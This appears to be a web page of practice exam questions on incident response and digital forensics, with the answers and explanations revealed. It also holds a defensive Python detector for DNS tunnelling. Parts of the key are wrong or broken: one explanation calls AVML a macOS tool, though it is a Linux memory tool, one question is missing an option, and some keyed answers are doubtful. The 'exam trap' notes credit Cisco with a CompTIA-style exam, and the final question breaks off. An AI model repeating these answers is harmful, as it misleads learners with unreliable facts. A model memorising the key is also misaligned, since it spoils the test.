CCNA Cysa Incident Response Questions

75 of 109 questions · Page 1/2 · Cysa Incident Response topic · Answers revealed

1
MCQ · medium

When performing digital forensics, which of the following represents the correct order of volatility from most volatile to least volatile?

A. RAM, CPU registers, disk, swap, logs, archived media
B. Swap, RAM, CPU registers, disk, logs, archived media
C. Archived media, logs, disk, swap, RAM, CPU registers
D. CPU registers, RAM, swap, disk, logs, archived media
Answer: D

This is the standard order of volatility.

Why this answer

The order of volatility dictates that evidence should be collected from most volatile to least volatile to avoid losing transient data. CPU registers are the most volatile, followed by RAM, swap, disk, logs, and archived media.

2
Multi-Select · medium

After a phishing incident, the security team wants to improve detection of similar attacks in the future. Which THREE actions should the team take as part of post-incident activity? (Choose THREE.)

Select 3 answers
A. Disabling user accounts that clicked the phishing link
B. Updating email filtering rules and detection signatures
C. Sharing indicators of compromise with other organizations via a threat intelligence platform
D. Conducting a lessons learned meeting to identify process improvements
E. Reimaging all affected workstations
Answers: B, C, D

This improves future detection of similar phishing emails.

Why this answer

Post-incident activities include updating detection rules, sharing IOCs, and conducting lessons learned to improve processes. Reimaging is recovery, and disabling accounts is containment.

3
MCQ · hard

During forensic analysis of a compromised Linux server, an analyst needs to acquire memory evidence. The server is running and the analyst has root access. Which of the following tools should the analyst use to capture the contents of RAM with the least impact on the system?

A. WinPmem
B. FTK Imager
C. dd if=/dev/mem of=mem.dump
D. LiME
Answer: D

LiME is specifically designed for Linux memory acquisition with minimal impact.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module that dumps memory and is designed to minimize footprint. It is commonly used for Linux memory acquisition.

4
MCQ · medium

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies an alert indicating a high volume of outbound traffic from a critical server to an unknown IP address. Which of the following actions should the analyst perform FIRST?

A. Correlate the alert with firewall logs and other security tools.
B. Notify law enforcement immediately.
C. Isolate the server from the network to prevent data exfiltration.
D. Rebuild the server from a known good backup.
Answer: A

Correlation helps validate the incident and gather more evidence.

Why this answer

According to NIST SP 800-61, during detection and analysis, the first step is to determine if an incident has occurred. Correlating the alert with other sources helps validate the incident and reduce false positives.

5
MCQ · hard

During a DDoS attack, the incident response team notices that the attack traffic originates from multiple IP addresses across different countries. The team decides to implement a long-term containment strategy. Which action is MOST appropriate for long-term containment?

A. Block the source IPs on the firewall.
B. Increase server bandwidth to absorb the traffic.
C. Implement BGP blackholing with the ISP.
D. Deploy additional load balancers.
Answer: C

BGP blackholing drops traffic to the targeted IP at the ISP level, mitigating DDoS.

Why this answer

Long-term containment focuses on preventing recurrence. Implementing BGP blackholing at the ISP level can mitigate future DDoS attacks by dropping traffic to the targeted IPs upstream.

6
MCQ · easy

Which of the following is an example of a behavioral indicator of compromise (IOC) observed during dynamic malware analysis?

A. PE section names
B. File hash
C. Domain name
D. Outbound network connection to a known malicious IP
Answer: D

Correct. This is behavior observed during execution.

Why this answer

Dynamic analysis monitors behavior such as network connections, file system changes, and process creation.

7
MCQ · medium

A security analyst is investigating a potential data breach. The analyst needs to preserve evidence before containment. Which of the following actions is MOST appropriate at this stage?

A. Powering off the system
B. Blocking the attacker's IP at the firewall
C. Disabling the user's account
D. Creating a forensic image of the hard drive
Answer: D

Correct. Imaging preserves the state of the disk for analysis.

Why this answer

Taking a forensic image of the affected system ensures evidence is preserved before any containment actions that could alter data.

8
MCQ · medium

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, a security analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which of the following is the most appropriate next step?

A. Notify law enforcement immediately.
B. Immediately isolate the host from the network.
C. Rebuild the host from a known good image.
D. Collect additional logs and perform a deeper analysis to confirm the compromise.
Answer: D

This aligns with the detection and analysis phase to validate the incident.

Why this answer

After detection, the analyst should collect additional data to confirm the incident and scope the impact before proceeding to containment.

9
Multi-Select · easy

During a post-incident review, a security analyst identifies that the mean time to detect (MTTD) for incidents is significantly higher than the industry benchmark. Which THREE actions should the analyst recommend to improve detection capabilities?

Select 3 answers
A. Implement additional network monitoring sensors.
B. Enhance SIEM correlation rules based on current threat intelligence.
C. Subscribe to threat intelligence feeds to enrich alerts.
D. Increase the frequency of vulnerability scans.
E. Reduce the retention period for logs.
Answers: A, B, C

More sensors improve visibility and reduce blind spots.

Why this answer

Updating detection rules, integrating threat intelligence, and improving monitoring coverage directly reduce detection time.

10
MCQ · medium

During the detection and analysis phase of an incident, an analyst identifies a file with a hash that matches a known malware signature. The analyst wants to enrich this IOC with additional context. Which resource is BEST suited for this enrichment?

A. Shodan
B. WHOIS lookup
C. VirusTotal
D. Passive DNS
Answer: C

VirusTotal provides threat intelligence enrichment for file hashes.

Why this answer

VirusTotal aggregates antivirus scan results and provides additional context such as file metadata, behavior, and community comments.

11
MCQ · medium

A security operations center (SOC) analyst receives an alert about a potential ransomware infection on a critical server. The incident response team needs to contain the threat quickly. Which of the following should be performed FIRST as a short-term containment measure?

A. Disable the user account associated with the alert
B. Run a full antivirus scan on the server
C. Isolate the affected network segment
D. Rebuild the server from a clean backup
Answer: C

Network isolation is a key short-term containment strategy to stop lateral movement.

Why this answer

Short-term containment focuses on immediate isolation to prevent further damage. Isolating the affected network segment stops the ransomware from spreading to other systems.

12
MCQ · medium

After containing a malware outbreak, the incident response team performs static malware analysis on a suspicious executable. Which of the following artifacts would be most helpful in creating a YARA rule to detect variants of the malware?

A. The creation timestamp of the file
B. The file size of the executable
C. The packer used to obfuscate the executable
D. The import table showing API calls like WriteProcessMemory and CreateRemoteThread
Answer: D

Common API calls used for injection are good indicators for YARA rules.

Why this answer

Import table analysis reveals API calls and DLLs used by the malware, which are often consistent across variants and useful for detection.

13
Multi-Select · hard

During a forensic investigation, an analyst must acquire digital evidence while maintaining forensic soundness. Which THREE practices should the analyst follow? (Choose three.)

Select 3 answers
A. Use the suspect's operating system to copy files
B. Power on the system to capture volatile data first
C. Verify the hash of the image against the original
D. Use a write blocker when imaging the hard drive
E. Document every action taken during the acquisition
Answers: C, D, E

Correct. Hash verification ensures integrity.

Why this answer

Write blockers prevent modification, hash verification ensures integrity, and proper documentation maintains chain of custody.

14
Multi-Select · medium

A security analyst is responding to a potential data exfiltration incident. As part of the containment strategy, the analyst must preserve evidence. Which TWO actions should the analyst take before containment? (Select two.)

Select 2 answers
A. Capture a forensic image of the affected systems
B. Change passwords for affected accounts
C. Disconnect the system from the network
D. Record current active network connections
E. Kill malicious processes
Answers: A, D

Imaging preserves disk state for analysis.

Why this answer

Forensic imaging of the affected systems captures the state before containment actions alter it. Recording current network connections captures volatile evidence that may be lost when the system is isolated.

15
MCQ · medium

An incident responder needs to collect memory from a Linux system during an incident. Which tool should the responder use?

A. LiME
B. avml
C. WinPmem
D. FTK Imager
Answer: A

LiME is a popular tool for Linux memory acquisition.

Why this answer

LiME (Linux Memory Extractor) is the correct tool because it is specifically designed to capture volatile memory from Linux systems, loading as a kernel module to safely dump RAM contents. During incident response, memory acquisition must be performed with minimal system interference, and LiME supports both raw and compressed output formats suitable for analysis with tools like Volatility.

Exam trap

Cisco often tests the distinction between operating-system-specific memory acquisition tools, and the trap here is that candidates may mistake AVML (macOS) or WinPmem (Windows) for cross-platform tools, or assume that FTK Imager can capture Linux memory when it is primarily a disk imager.

How to eliminate wrong answers

Option B (avml) is wrong because it is a memory acquisition tool for macOS, not Linux. Option C (WinPmem) is wrong because it is a Windows memory acquisition tool, part of the Rekall framework, and does not run on Linux. Option D (FTK Imager) is wrong because it is a forensic imaging tool primarily for disk acquisition on Windows systems, not designed for Linux memory capture.

16
MCQ · easy

During the detection and analysis phase of the NIST SP 800-61 incident response lifecycle, an analyst identifies suspicious network traffic from an internal host to a known malicious IP address. Which step should the analyst perform next to validate the alert?

A. Search for the IP address on VirusTotal and Shodan.
B. Correlate the alert with other logs and endpoint data to confirm malicious activity.
C. Escalate the alert to the incident response team for containment.
D. Contain the host immediately by disconnecting it from the network.
Answer: B

Correlation helps validate the alert before taking action.

Why this answer

Option B is correct because during the detection and analysis phase, the primary goal is to validate the alert by correlating it with additional data sources (e.g., firewall logs, DNS logs, endpoint detection and response (EDR) telemetry) to confirm whether the traffic is truly malicious or a false positive. Simply searching external threat intelligence (Option A) provides context but does not confirm activity on the host; escalation (Option C) and containment (Option D) are premature without validated evidence.

Exam trap

Cisco often tests the misconception that external threat intelligence alone (Option A) is sufficient for validation, when in fact the NIST framework emphasizes internal log correlation to confirm malicious activity before taking further action.

How to eliminate wrong answers

Option A is wrong because searching VirusTotal and Shodan only provides external reputation data and does not validate whether the internal host actually communicated with the IP or if the traffic was benign (e.g., a false positive from a misconfigured proxy). Option C is wrong because escalation to the incident response team should occur only after the alert has been validated through correlation; premature escalation wastes resources and may lead to unnecessary incident handling. Option D is wrong because immediate containment (e.g., disconnecting the host) is a reactive step that should follow validation and a formal incident declaration; acting without confirmation can disrupt legitimate business operations and violate the NIST SP 800-61 containment strategy.

17
Multi-Select · hard

A CSIRT is investigating a ransomware incident that encrypted files on multiple servers. The team needs to determine the initial infection vector. Which THREE pieces of evidence should the team prioritize collecting? (Select three.)

Select 3 answers
A. Email gateway logs for the week prior to the incident
B. Endpoint detection and response (EDR) logs from affected servers
C. Network traffic logs from the perimeter firewall
D. Physical access logs to the data center
E. Firewall configuration backups
Answers: A, B, C

Email logs may show phishing emails that delivered the ransomware.

Why this answer

Email logs can reveal phishing attachments or links. Endpoint logs may show process execution or downloads. Network logs can identify C2 communication or lateral movement.

These three together help trace the initial entry.

18
MCQ · medium

A security analyst is conducting static analysis of a suspicious executable. Which of the following tools or techniques is BEST suited for extracting strings and viewing the import table?

A. LiME
B. FTK Imager
C. Cuckoo Sandbox
D. PEview or CFF Explorer
Answer: D

These tools are designed for static analysis of PE files, including viewing imports and strings.

Why this answer

Static analysis often involves examining the PE header, imports, and strings. Tools like PEview or CFF Explorer, or simply the 'strings' command, can extract readable strings. The import table shows the DLLs and functions the executable uses.

19
MCQ · medium

After containing a security incident, the incident response team conducts a root cause analysis. Which of the following is the PRIMARY purpose of this activity?

A. To identify the initial attack vector
B. To calculate the financial loss
C. To document the timeline
D. To assign blame to individuals
Answer: A

Root cause analysis determines how the incident started, allowing for preventive measures.

Why this answer

Root cause analysis aims to identify the underlying cause of the incident to prevent recurrence. It is a key part of post-incident activity.

20
MCQ · medium

After a DDoS attack, the incident response team wants to improve detection and prevention. Which of the following metrics would be MOST useful for evaluating the effectiveness of the response?

A. Mean Time to Respond (MTTR)
B. Number of false positives
C. Mean Time to Detect (MTTD)
D. Incidents per week
Answer: A

MTTR measures how quickly the team responds and mitigates incidents, reflecting response effectiveness.

Why this answer

Mean Time to Respond (MTTR) measures the average time taken to respond to incidents, which is a key metric for evaluating response effectiveness.

21
Multi-Select · hard

During a malware outbreak, an incident responder uses YARA rules to detect similar malware across the environment. The responder created a custom YARA rule based on static analysis of the malware sample. Which THREE elements are MOST useful for creating an effective YARA rule for this malware? (Choose THREE.)

Select 3 answers
A. Unique strings found in the malware binary
B. The file size of the malware sample
C. Behavior observed in a sandbox, such as registry changes
D. PE header characteristics such as section names and entry point
E. Metadata such as the compile timestamp and file description
Answers: A, D, E

Strings like IP addresses or unique messages are key indicators.

Why this answer

YARA rules commonly use strings, PE header characteristics, and file metadata. File size and dynamic behavior are not used in static YARA rules.

22
MCQ · medium

An organization's security team receives an alert about a potential ransomware infection on a critical server. The severity classification is 'high' because the server supports a production database. According to the incident response plan, which containment action should be taken first to minimize data loss?

A. Reboot the server to clear the ransomware from memory.
B. Disconnect the server from the network.
C. Kill the ransomware process using task manager.
D. Create a full disk image of the server before any action.
Answer: B

Network isolation is a short-term containment step that halts communication and further damage.

Why this answer

Isolating the network connection prevents lateral movement and further encryption while preserving evidence for forensic analysis.

23
MCQ · medium

A security analyst is performing static analysis on a suspicious PE file. Which initial step should the analyst take to understand the file's imports and potential capabilities?

A. Create a YARA rule based on hash characteristics.
B. Run the file in a sandbox and observe behavior.
C. Extract strings from the file.
D. Analyze the PE header and import table.
Answer: D

The PE header contains the import table, which lists DLLs and functions the file uses.

Why this answer

Analyzing the import table reveals which Windows API functions the file uses, providing insight into its functionality (e.g., network, file, or registry operations).

24
Multi-Select · hard

During a forensic investigation, an analyst needs to acquire disk images from multiple suspect drives. Which THREE practices ensure forensic soundness? (Select THREE.)

Select 3 answers
A. Documenting the chain of custody for each drive
B. Using the fastest available imaging method without verification
C. Computing and verifying hashes (e.g., SHA-256) of the original and the image
D. Using a hardware write blocker to prevent writes to the source drive
E. Acquiring the image while the system is running (live acquisition)
Answers: A, C, D

Chain of custody documents who handled the evidence and when.

Why this answer

Forensic soundness requires maintaining evidence integrity. Using a verified write blocker prevents alteration. Hashing the original and copy ensures integrity.

Documenting the chain of custody maintains accountability.

25
MCQ · easy

An analyst receives an alert about a user account that has been locked out multiple times within an hour. The account belongs to a system administrator. Which incident category does this scenario most likely fall under?

A. Insider threat
B. DDoS
C. Ransomware
D. Phishing
Answer: A

Abnormal account activity could indicate an insider threat or compromised credentials.

Why this answer

A system administrator account being locked out multiple times in an hour suggests a deliberate attempt to guess or brute-force the credentials, or the admin themselves may be performing unauthorized actions that trigger lockout policies. This aligns with an insider threat because the account has elevated privileges and the anomalous lockout pattern indicates either a compromised credential or malicious insider activity, not an external network-based attack.

Exam trap

Cisco often tests the distinction between the attack vector (e.g., phishing) and the resulting incident category (e.g., insider threat), so candidates may incorrectly choose phishing because they focus on how credentials were stolen rather than the behavioral indicator of the lockout itself.

How to eliminate wrong answers

Option B (DDoS) is wrong because a Distributed Denial-of-Service attack targets network bandwidth or application availability, not individual user account lockouts; account lockouts are caused by repeated failed authentication attempts, not traffic floods. Option C (Ransomware) is wrong because ransomware typically involves file encryption and ransom demands, not repeated account lockouts; lockouts could be a side effect of a ransomware attack but are not the primary incident category. Option D (Phishing) is wrong because phishing is a social engineering technique to steal credentials, not the direct cause of multiple lockouts; while a phished credential could lead to lockouts, the scenario describes the lockout event itself, which is an insider threat indicator.

26
MCQ · hard

A security analyst is performing dynamic analysis of a suspicious file in a sandbox. Which of the following observations is most indicative of ransomware behavior?

A. The file injects code into a legitimate process
B. The file opens and overwrites documents with a new extension and drops a ransom note
C. The file creates a registry run key
D. The file attempts to connect to multiple external IPs
Answer: B

Overwriting files and dropping a ransom note are classic ransomware behaviors.

Why this answer

Ransomware typically encrypts files and renames them with a new extension. Dropping a ransom note and leaving encrypted files is characteristic.

27
MCQ · easy

An organization is implementing an incident response plan. Which phase of the NIST SP 800-61 lifecycle includes activities such as creating policies, establishing IR teams, and acquiring necessary tools?

A. Containment, Eradication, and Recovery
B. Detection and Analysis
C. Preparation
D. Post-Incident Activity
Answer: C

Preparation includes all readiness activities before an incident occurs.

Why this answer

Preparation involves all proactive measures to enable effective incident response, including policy, team, and tool readiness.

28
Multi-Select · medium

A security analyst is investigating a potential data breach. The analyst needs to collect digital evidence while preserving its integrity. Which TWO actions should the analyst take? (Choose TWO.)

Select 2 answers
A. Run a full antivirus scan on the system.
B. Delete any malicious files found during the investigation.
C. Verify the hash of the acquired image against the original.
D. Use a write blocker when imaging the hard drive.
E. Connect the suspect drive to a forensic workstation without a write blocker.
Answers: C, D

Hash verification ensures the image is an exact copy.

Why this answer

Write blockers prevent modification of the original media during acquisition, and hash verification ensures the integrity of the acquired image by comparing hashes.

29
Multi-Select · easy

An organization's incident response team is classifying an incident based on severity and priority. Which TWO factors should the team consider when determining the priority of an incident? (Select TWO.)

Select 2 answers
A. The number of users reporting the issue.
B. The potential business impact of the incident.
C. The criticality of the affected systems or data.
D. The time of day the incident occurred.
E. The type of threat actor involved.
Answers: B, C

Higher business impact leads to higher priority.

Why this answer

Priority is often based on the criticality of the affected assets and the potential business impact, as these determine how quickly the incident needs to be addressed.

30
MCQ · medium

An analyst is using YARA to create rules for detecting a specific malware strain. Which of the following pieces of information is MOST useful for writing a YARA rule?

A. The malware's file size.
B. The date the malware was first seen.
C. A unique string within the malware.
D. The malware's MD5 hash.
Answer: C

Unique strings are commonly used in YARA rules.

Why this answer

YARA rules are based on patterns in the file, such as strings and byte sequences. A unique string found in the malware sample can be used to create a rule that identifies the malware.

31
MCQ · hard

An organization's incident response team is handling a ransomware incident where critical servers have been encrypted. The team has identified the ransomware variant and determined that decryption is not possible. Which of the following is the BEST post-incident activity to prevent recurrence?

A. Increase the frequency of vulnerability scans.
B. Share IOCs with the industry ISAC.
C. Conduct a root cause analysis to determine the initial infection vector.
D. Reimage all affected servers from backups.
Answer: C

Root cause analysis is a key post-incident activity to identify and fix underlying weaknesses.

Why this answer

Root cause analysis identifies how the ransomware entered, allowing the organization to implement preventive controls like patching, access controls, or user training.

32
MCQ · medium

An analyst is examining a disk image acquired from a compromised Linux server. The analyst needs to verify that the image is an exact bit-for-bit copy of the original drive. Which forensically sound procedure should the analyst perform?

A. Compare the hash of the image to the hash of the original drive.
B. Use a write blocker when acquiring the image.
C. Mount the image in read-only mode.
D. Analyze the image with a hex editor.
Answer: A

Hash comparison confirms that the image is an exact copy.

Why this answer

Hash verification ensures the image matches the original by comparing cryptographic hashes (e.g., MD5, SHA-256) generated during acquisition.

33
MCQ · easy

An organization's security team receives a report of a potential insider threat. An employee is suspected of accessing sensitive files without authorization. Which incident category BEST describes this scenario?

A. Malware
B. Insider threat
C. Data breach
D. Ransomware
Answer: B

The scenario describes an employee acting maliciously or negligently, which is an insider threat.

Why this answer

An insider threat is a security risk originating from within the organization, often involving unauthorized access or data exfiltration by employees.

34
MCQ · medium

During dynamic analysis of a malware sample in a sandbox, the analyst observes that the malware attempts to connect to an IP address 198.51.100.23 and modifies the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which IOC type is the IP address an example of?

A. Network indicator
B. File hash
C. Email indicator
D. Domain name
Answer: A

IP addresses are network-based indicators of compromise.

Why this answer

IP addresses are a common type of indicator of compromise, representing network-based IOCs that can be used for detection.

35
MCQ · easy

Which of the following is the FIRST step in the NIST SP 800-61 incident response lifecycle?

A. Detection and Analysis
B. Post-Incident Activity
C. Preparation
D. Containment, Eradication, and Recovery
Answer: C

Preparation is the first phase.

Why this answer

The NIST SP 800-61 lifecycle begins with Preparation, which includes establishing policies, tools, and training before an incident occurs.

36
MCQ · medium

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for a recent breach was 14 days, while the mean time to respond (MTTR) was 6 hours. Which metric should the team prioritize to improve in future incidents?

A. Percentage of incidents containing malware
B. Number of incidents per week
C. Mean time to respond (MTTR)
D. Mean time to detect (MTTD)
Answer: D

Reducing MTTD will help contain incidents earlier and reduce impact.

Why this answer

A high MTTD indicates the organization is not detecting incidents quickly enough, which increases dwell time and potential damage.

37
MCQ · hard

During a post-incident review, the incident response team identifies that the mean time to detect (MTTD) for incidents is significantly higher than industry benchmarks. Which of the following improvements would most directly reduce MTTD?

A. Increasing the number of forensic analysts on call.
B. Conducting more frequent tabletop exercises.
C. Implementing automated alerting based on threat intelligence.
D. Rotating credentials after each incident.
Answer: C

Automated alerts reduce the time between compromise and detection.

Why this answer

MTTD is the average time to detect an incident. Implementing automated alerting and correlation rules from threat intelligence can speed up detection by reducing manual analysis time.

38
MCQ · easy

An organization has identified indicators of compromise (IOCs) from a recent incident. Which data format is specifically designed for sharing threat intelligence in a standardized, machine-readable way?

A. PDF
B. CSV
D. STIX
Answer: D

Correct. STIX is a standardized language for threat intelligence.

Why this answer

STIX (Structured Threat Information Expression) is a language for sharing threat intelligence.

39
MCQ · medium

During a post-incident review, the CSIRT identifies that the mean time to detect (MTTD) is significantly higher than the industry benchmark. Which initiative would MOST likely reduce MTTD?

A. Conducting more frequent tabletop exercises
B. Rotating credentials for all service accounts
C. Deploying additional endpoint detection and response (EDR) sensors
D. Implementing a new patch management process
Answer: C

Correct. More sensors improve visibility and reduce detection time.

Why this answer

Improving detection capabilities through enhanced monitoring and alerting reduces detection time.

40
MCQ · easy

An analyst needs to capture the contents of volatile memory from a Windows system suspected of being compromised. Which tool should the analyst use to acquire a memory image?

A. WinPmem
B. LiME
C. FTK Imager
D. dd
Answer: A

WinPmem is a dedicated tool for acquiring memory from Windows systems.

Why this answer

WinPmem is a memory acquisition tool for Windows systems, capable of capturing RAM contents for analysis.

41
MCQ · hard

An analyst runs a YARA rule against a set of files and gets a hit. The rule was written to detect a specific malware family. What is the PRIMARY purpose of using YARA rules in this context?

A. To sandbox the malware for dynamic analysis
B. To identify files that match known malware characteristics
C. To verify the hash of the malware sample
D. To extract strings from the malware
Answer: B

Correct. YARA rules detect patterns indicative of malware.

Why this answer

YARA is a pattern-matching tool used to identify and classify malware samples based on textual or binary patterns.

42
MCQ · medium

During a dynamic malware analysis session, a security analyst uses a sandbox to detonate a suspicious file. Which of the following observations would be considered a behavioral indicator of compromise (IOC)?

A. The file has a suspicious import table
B. The file's PE header indicates it is packed
C. The file creates a scheduled task
D. The file makes outbound connections to an unknown IP address
Answer: D

Outbound network connections are classic behavioral IOCs observed during dynamic analysis.

Why this answer

Behavioral IOCs include actions performed by the malware, such as network connections, file creation, or registry changes. Outbound connections to an unknown IP indicate command-and-control activity.

43
MCQ · hard

During a ransomware incident, the incident response team needs to preserve evidence before containment. Which of the following actions should be performed BEFORE isolating the infected system from the network?

A. Capture the contents of RAM.
B. Run an antivirus scan.
C. Disable the network interface.
D. Capture a forensic image of the hard drive.
Answer: A

RAM is volatile and must be captured before any changes to the system state.

Why this answer

The order of volatility requires capturing volatile data like RAM before the system is isolated or shut down. Isolation changes live state (active sockets and C2 sessions disappear) and may trigger the malware's failsafes, while a memory image taken first preserves running processes, injected code and, for some ransomware families, the encryption keys in use.

44
Multi-Selectmedium

A security analyst is investigating a potential malware infection on a Windows workstation. The analyst needs to collect evidence while preserving the order of volatility. Which TWO pieces of data should the analyst collect FIRST? (Select TWO)

Select 2 answers
A.System event logs
B.Contents of the hard drive
C.Registry hives
D.Contents of RAM
E.Running processes and network connections
AnswersD, E

RAM is highly volatile and must be captured before powering off.

Why this answer

The order of volatility (RFC 3227) places CPU registers and cache first, then routing tables, ARP cache, the process table, kernel statistics and memory, then temporary file systems, disk, remote logging data and archival media. Among the options given, running processes and network connections (option E) and the contents of RAM (option D) sit in the most volatile tier and disappear on power-off; event logs, registry hives and the disk image are persistent and can be collected afterwards.

45
MCQhard

After containing a data breach, the incident response team discovers that an attacker exfiltrated sensitive data over DNS tunneling. Which of the following detection rules would BEST identify similar activity in the future?

A.A SIEM alert for any DNS query exceeding 100 bytes
B.A Snort rule blocking traffic to known malicious IPs
C.A firewall rule that blocks all DNS requests from internal servers
D.A YARA rule that flags DNS queries with high entropy domain names
AnswerD

High entropy in domain names is a common indicator of DNS tunneling.

Why this answer

DNS tunneling encodes data in the query names, so the traffic shows unusually long, high-entropy subdomain labels, many unique subdomains under one registered domain, and a preference for record types such as TXT or NULL. Option D names the right detection logic; note that YARA itself matches patterns in files and memory, so in practice this analytic is implemented as a SIEM correlation rule or an IDS/Zeek script over DNS logs. Option A alerts on a raw size threshold alone and would be very noisy, option B targets known IPs that a tunneling domain does not need, and option C would break name resolution for the servers.
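Worked example (added here, not part of the original question set or any vendor's code): the analytic option D describes, written the way it would run as a SIEM or Zeek-style detection over DNS query logs rather than as a YARA rule. It goes a little beyond the question by aggregating per registered domain, counting unique subdomains and rare record types, and alerting only after repeated hits, which is what keeps a single long CDN hostname from paging anyone. The log line format, the thresholds and the two-label rule for the registered domain are assumptions; the log lines, client addresses and domains are constructed.

```python
"""Heuristic detection of DNS tunnelling in DNS query logs.

Added example for this page, not code from the page or from any vendor.
The log format and every threshold below are assumptions to tune per
environment; the sample log is constructed.
"""
import math
from collections import defaultdict

# Constructed sample log: "<timestamp> <client_ip> <query_name> <qtype>".
SAMPLE_DNS_LOG = """\
2024-05-01T02:00:01Z 10.0.5.23 www.example.com A
2024-05-01T02:00:02Z 10.0.5.23 mail.example.com MX
2024-05-01T02:00:02Z 10.0.5.41 zjq4lkq9v7x2p0sa8w3m1n6hbd5tfe.data.example.net TXT
2024-05-01T02:00:03Z 10.0.5.41 8fh2k5lsq0z3vmx7p1ya9b4wen6tcr.data.example.net TXT
2024-05-01T02:00:03Z 10.0.5.41 y6d1m8pk3q0wx5nvz2ts7lfb4hj9ea.data.example.net TXT
2024-05-01T02:00:04Z 10.0.5.41 c3rx7hb0ws4k9q2pn6jf1lmz5tyv8d.data.example.net TXT
2024-05-01T02:00:05Z 10.0.5.23 a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.cdn-cache.example.org A
2024-05-01T02:00:06Z 10.0.5.77 updates.example.org A
"""

QNAME_LEN_THRESHOLD = 60      # assumption: total query name length considered long
LABEL_LEN_THRESHOLD = 30      # assumption: a single label this long is rare in benign traffic
ENTROPY_THRESHOLD = 3.8       # assumption: bits/char; base32/base64 payload labels sit above this
RARE_QTYPES = {"TXT", "NULL"}  # record types tunnelling tools favour for capacity
MIN_SUSPICIOUS = 3            # alert on a domain only after repeated suspicious queries
REGISTERED_LABELS = 2         # assumption: the last two labels are the registered domain


def shannon_entropy(text):
    """Bits per character of `text` (0.0 for empty or single-symbol strings)."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (registered_domain, subdomain) for a query name, normalised to lower case."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= REGISTERED_LABELS:
        return ".".join(labels), ""
    return ".".join(labels[-REGISTERED_LABELS:]), ".".join(labels[:-REGISTERED_LABELS])


def score_query(qname):
    """Return the reasons a single query name looks like tunnelling (empty list if benign)."""
    reasons = []
    _, sub = split_qname(qname)
    if len(qname) > QNAME_LEN_THRESHOLD:
        reasons.append("long_qname")
    longest = max(sub.split("."), key=len) if sub else ""
    if len(longest) >= LABEL_LEN_THRESHOLD:
        reasons.append("long_label")
    if shannon_entropy(longest) >= ENTROPY_THRESHOLD:
        reasons.append("high_entropy_label")
    return reasons


def parse_log(text):
    """Yield (timestamp, client, qname, qtype) tuples, skipping blank or malformed lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            yield parts[0], parts[1], parts[2], parts[3].upper()


def detect_tunnelling(log_text):
    """Aggregate per registered domain; return only domains that cross the alert threshold."""
    stats = defaultdict(lambda: {"queries": 0, "suspicious_queries": 0,
                                 "rare_record_types": 0, "subdomains": set(), "clients": set()})
    for _ts, client, qname, qtype in parse_log(log_text):
        registered, sub = split_qname(qname)
        s = stats[registered]
        s["queries"] += 1
        s["subdomains"].add(sub)
        s["clients"].add(client)
        if qtype in RARE_QTYPES:
            s["rare_record_types"] += 1
        if score_query(qname):
            s["suspicious_queries"] += 1
    alerts = {}
    for domain, s in stats.items():
        if s["suspicious_queries"] >= MIN_SUSPICIOUS:
            alerts[domain] = {"queries": s["queries"],
                              "suspicious_queries": s["suspicious_queries"],
                              "unique_subdomains": len(s["subdomains"]),
                              "rare_record_types": s["rare_record_types"],
                              "clients": sorted(s["clients"])}
    return alerts


if __name__ == "__main__":
    for domain, info in detect_tunnelling(SAMPLE_DNS_LOG).items():
        print(domain, info)
```

On the constructed log only example.net alerts: four TXT queries from one client, each with a 30-character label at roughly 4.9 bits per character. The single hex-looking CDN label under example.org scores as suspicious on its own but never reaches the per-domain threshold, which is the false-positive control a raw size alert like option A lacks.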

46
MCQeasy

During which phase of the NIST SP 800-61 incident response lifecycle would an organization conduct a lessons learned meeting?

A.Containment, Eradication, and Recovery
B.Detection and Analysis
C.Post-Incident Activity
D.Preparation
AnswerC

Correct. This phase includes lessons learned and reporting.

Why this answer

The post-incident activity phase includes lessons learned, root cause analysis, and improvement actions.

47
MCQmedium

A security analyst detects ransomware on a critical server. Which containment strategy should be implemented FIRST to minimize damage?

A.Run a full antivirus scan on the server
B.Block the ransomware's command-and-control IP at the firewall
C.Rebuild the server from a clean backup
D.Disconnect the server from the network
AnswerD

Correct. Network isolation prevents further encryption of shared drives.

Why this answer

Immediate network isolation (short-term containment) stops lateral spread and limits damage.

48
Multi-Selecthard

A security analyst is investigating a potential data exfiltration incident. The analyst captures memory from a Windows system and finds a process that is injecting code into other processes. Which THREE indicators from the memory analysis would MOST strongly suggest malicious activity? (Select THREE.)

Select 3 answers
A.The process has memory regions with RWX permissions.
B.The process is hidden from the task manager.
C.The process is making calls to WriteProcessMemory and CreateRemoteThread.
D.The process name is a known Windows system process.
E.The process has a valid digital signature.
AnswersA, B, C

RWX memory is often used for injected shellcode.

Why this answer

Suspicious memory regions (like RWX), unusual API calls (e.g., WriteProcessMemory), and hidden processes are strong indicators of malware or code injection.

49
MCQeasy

A security analyst is classifying an incident where an employee's workstation is infected with ransomware that encrypts files and displays a ransom note. Which incident category and severity level best describe this scenario?

A.DDoS, low
B.Malware, moderate
C.Data breach, high
D.Insider threat, high
AnswerB

Ransomware is malware, and a single workstation infection without critical data impact is moderate.

Why this answer

Option B is correct because ransomware is a specific subtype of malware that encrypts files and demands payment, making 'Malware' the appropriate incident category. The severity is 'moderate' because while the infection impacts a single workstation and causes data loss, it does not immediately compromise the entire network or expose sensitive data at scale, aligning with typical moderate-severity criteria for isolated malware incidents.

Exam trap

Cisco often tests the distinction between 'Malware' and 'Data breach' by making candidates assume that file encryption automatically implies data exfiltration, but ransomware typically does not exfiltrate data unless it is a double-extortion variant.

How to eliminate wrong answers

Option A is wrong because a DDoS (Distributed Denial of Service) attack involves overwhelming a network or server with traffic to disrupt availability, not encrypting files on a single workstation; ransomware does not cause network-level flooding. Option C is wrong because a data breach requires unauthorized access or exfiltration of sensitive data, whereas ransomware here only encrypts local files without evidence of data theft or exposure. Option D is wrong because an insider threat involves malicious or negligent actions by an authorized user, but the scenario describes an external malware infection (ransomware) with no indication of employee intent or privilege misuse.

50
MCQeasy

